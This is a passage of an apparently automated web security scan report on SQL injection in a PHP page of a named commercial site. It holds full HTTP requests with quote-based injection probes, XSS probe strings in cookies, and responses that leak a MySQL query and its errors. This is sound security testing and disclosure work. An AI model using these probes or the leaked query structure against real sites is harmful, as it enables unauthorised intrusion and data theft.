OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:35:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=umubjd1bc1v1dvhkbkuj07tuf5; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project_dynamic_page_updated.php was not found on this server.</p>

1.309. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:40:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8g2inhtg7i9kof989d0bodhs55; path=/
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1'=1' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:40:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c239emqf4fd19ed5vjlg5mjk02; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project_dynamic_page_updated.php was not found on this server.</p>

1.310. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hc44mrg2025m2aprpls769aql3; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3'' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&templa' at line 5

Request 2

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 